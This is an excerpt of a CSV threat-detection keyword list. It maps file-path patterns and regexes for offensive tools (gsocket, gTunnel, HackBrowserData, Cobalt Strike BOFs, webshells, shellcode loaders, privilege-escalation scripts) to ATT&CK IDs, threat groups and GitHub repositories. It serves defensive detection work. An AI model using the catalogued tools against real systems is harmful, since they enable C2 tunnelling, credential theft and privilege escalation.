"*/gsocket/releases/latest*",".{0,1000}\/gsocket\/releases\/latest.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7647"
"*/gsocket_*_all.deb*",".{0,1000}\/gsocket_.{0,1000}_all\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7648"
"*/gsocket_*_x86_64.deb*",".{0,1000}\/gsocket_.{0,1000}_x86_64\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7649"
"*/gsocket_*aarch64.deb*",".{0,1000}\/gsocket_.{0,1000}aarch64\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7650"
"*/gsocket_*arm.deb*",".{0,1000}\/gsocket_.{0,1000}arm\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7651"
"*/gsocket_*armv6.deb*",".{0,1000}\/gsocket_.{0,1000}armv6\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7652"
"*/gsocket_*armv7l.deb*",".{0,1000}\/gsocket_.{0,1000}armv7l\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7653"
"*/gsocket_*i686.deb*",".{0,1000}\/gsocket_.{0,1000}i686\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7654"
"*/gsocket_*mips32.deb*",".{0,1000}\/gsocket_.{0,1000}mips32\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7655"
"*/gsocket_*mips64.deb*",".{0,1000}\/gsocket_.{0,1000}mips64\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7656"
"*/gsocket_*mipsel.deb*",".{0,1000}\/gsocket_.{0,1000}mipsel\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7657"
"*/gsocket_dso.so.*",".{0,1000}\/gsocket_dso\.so\..{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7658"
"*/gsocket_latest_all.deb*",".{0,1000}\/gsocket_latest_all\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7659"
"*/gsocket-build*",".{0,1000}\/gsocket\-build.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7660"
"*/gsocket-deb*",".{0,1000}\/gsocket\-deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7661"
"*/gsocket-pkg/*",".{0,1000}\/gsocket\-pkg\/.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7662"
"*/gsocket-src*",".{0,1000}\/gsocket\-src.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7663"
"*/gsocket-ssl.h*",".{0,1000}\/gsocket\-ssl\.h.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7664"
"*/gsocket-tor*",".{0,1000}\/gsocket\-tor.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7665"
"*/gsocket-tor*",".{0,1000}\/gsocket\-tor.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7666"
"*/gsocket-util.c*",".{0,1000}\/gsocket\-util\.c.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7667"
"*/gs-portforward.service*",".{0,1000}\/gs\-portforward\.service.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7668"
"*/gs-root-shell.service*",".{0,1000}\/gs\-root\-shell\.service.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7669"
"*/gs-sftp*",".{0,1000}\/gs\-sftp.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#linux","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","7670"
"*/gtfobin_update.py*",".{0,1000}\/gtfobin_update\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","1","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","7672"
"*/gtfobins.go*",".{0,1000}\/gtfobins\.go.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","7673"
"*/gtfobins.py*",".{0,1000}\/gtfobins\.py.{0,1000}","offensive_tool_keyword","BeRoot","Privilege Escalation Project - Windows / Linux / Mac ","T1053.005 - T1069.002 - T1069.001 - T1053.003 - T1087.001 - T1087.002 - T1082 - T1135 - T1049 - T1007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/AlessandroZ/BeRoot","1","1","#linux","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","7674"
"*/gtfonow.py*",".{0,1000}\/gtfonow\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","1","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","7675"
"*/gTunnel.git*",".{0,1000}\/gTunnel\.git.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","7676"
"*/gTunnel/gtuncli*",".{0,1000}\/gTunnel\/gtuncli.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","7677"
"*/gtunnel/releases/*",".{0,1000}\/gtunnel\/releases\/.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","7678"
"*/gtunnel/tarball/*",".{0,1000}\/gtunnel\/tarball\/.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","7679"
"*/gtunnel/zipball/*",".{0,1000}\/gtunnel\/zipball\/.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","1","N/A","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","7680"
"*/gtunnel_*.log*",".{0,1000}\/gtunnel_.{0,1000}\.log.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#linux","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","7681"
"*/guervild/BOFs*",".{0,1000}\/guervild\/BOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","7683"
"*/guessed_emails.txt*",".{0,1000}\/guessed_emails\.txt.{0,1000}","offensive_tool_keyword","AttackSurfaceMapper","AttackSurfaceMapper (ASM) is a reconnaissance tool that uses a mixture of open source intelligence and active techniques to expand the attack surface of your target","T1595 - T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/superhedgy/AttackSurfaceMapper","1","0","#linux","N/A","6","10","1355","197","2024-04-08T16:13:24Z","2019-08-07T14:32:53Z","7684"
"*/gyaansastra/CVE-2022-0847*",".{0,1000}\/gyaansastra\/CVE\-2022\-0847.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0008","N/A","N/A","Exploitation tool","https://github.com/gyaansastra/CVE-2022-0847","1","1","N/A","N/A","N/A","1","2","2","2022-03-20T15:46:04Z","2022-03-09T15:44:58Z","7685"
"*/GzipB64.exe*",".{0,1000}\/GzipB64\.exe.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","7686"
"*/H Remote Admin Tools.exe*",".{0,1000}\/H\sRemote\sAdmin\sTools\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","7687"
"*/h4ntu shell [powered by tsoi].php*",".{0,1000}\/h4ntu\sshell\s\[powered\sby\stsoi\]\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","7688"
"*/h8mail/*",".{0,1000}\/h8mail\/.{0,1000}","offensive_tool_keyword","h8mail","Powerful and user-friendly password hunting tool.","T1581.002 - T1591 - T1590 - T1596 - T1592 - T1217.001","TA0010","N/A","N/A","Reconnaissance","https://github.com/opencubicles/h8mail","1","1","N/A","N/A","N/A","1","11","4","2019-08-19T09:46:33Z","2019-08-19T09:45:32Z","7689"
"*/HackBrowserData*",".{0,1000}\/HackBrowserData.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555 - T1189 - T1217 - T1185","TA0002 - TA0009 - TA0001 - TA0010","N/A","N/A","Exploitation tool","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7690"
"*/hack-browser-data.exe*",".{0,1000}\/hack\-browser\-data\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","7691"
"*/HackBrowserData.git*",".{0,1000}\/HackBrowserData\.git.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7692"
"*/hack-browser-data-linux-386.zip*",".{0,1000}\/hack\-browser\-data\-linux\-386\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","1","#linux","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7693"
"*/hack-browser-data-linux-amd64.zip*",".{0,1000}\/hack\-browser\-data\-linux\-amd64\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","1","#linux","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7694"
"*/hack-browser-data-linux-arm.zip*",".{0,1000}\/hack\-browser\-data\-linux\-arm\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","1","#linux","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7695"
"*/hack-browser-data-linux-arm64.zip*",".{0,1000}\/hack\-browser\-data\-linux\-arm64\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","1","#linux","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7696"
"*/hack-browser-data-osx-64bit.zip*",".{0,1000}\/hack\-browser\-data\-osx\-64bit\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7697"
"*/hack-browser-data-windows-32bit.zip*",".{0,1000}\/hack\-browser\-data\-windows\-32bit\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7698"
"*/hack-browser-data-windows-64bit.zip*",".{0,1000}\/hack\-browser\-data\-windows\-64bit\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","1","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","7699"
"*/hackerid.py*",".{0,1000}\/hackerid\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","7700"
"*/hackingtool.git*",".{0,1000}\/hackingtool\.git.{0,1000}","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1059 - T1078 - T1105 - T1110 - T1566","TA0002 - TA0008 - TA0009 - TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","N/A","10","52217","5629","2025-03-03T15:17:19Z","2020-04-11T09:21:31Z","7701"
"*/hackshell.sh*",".{0,1000}\/hackshell\.sh.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","7702"
"*/Hack-Tools.git*",".{0,1000}\/Hack\-Tools\.git.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/LasCC/Hack-Tools","1","1","N/A","N/A","9","10","6045","678","2025-01-05T23:10:49Z","2020-06-22T21:42:16Z","7703"
"*/Hades.exe*",".{0,1000}\/Hades\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","0","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","7704"
"*/hades.git*",".{0,1000}\/hades\.git.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","1","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","7705"
"*/HadesLdr.git*",".{0,1000}\/HadesLdr\.git.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","7706"
"*/hades-main.zip*",".{0,1000}\/hades\-main\.zip.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tool","https://github.com/f1zm0/hades","1","1","N/A","N/A","N/A","4","364","47","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z","7707"
"*/hadoop-datanode-info.nse*",".{0,1000}\/hadoop\-datanode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7708"
"*/hadoop-jobtracker-info.nse*",".{0,1000}\/hadoop\-jobtracker\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7709"
"*/hadoop-namenode-info.nse*",".{0,1000}\/hadoop\-namenode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7710"
"*/hadoop-secondary-namenode-info.nse*",".{0,1000}\/hadoop\-secondary\-namenode\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","7711"
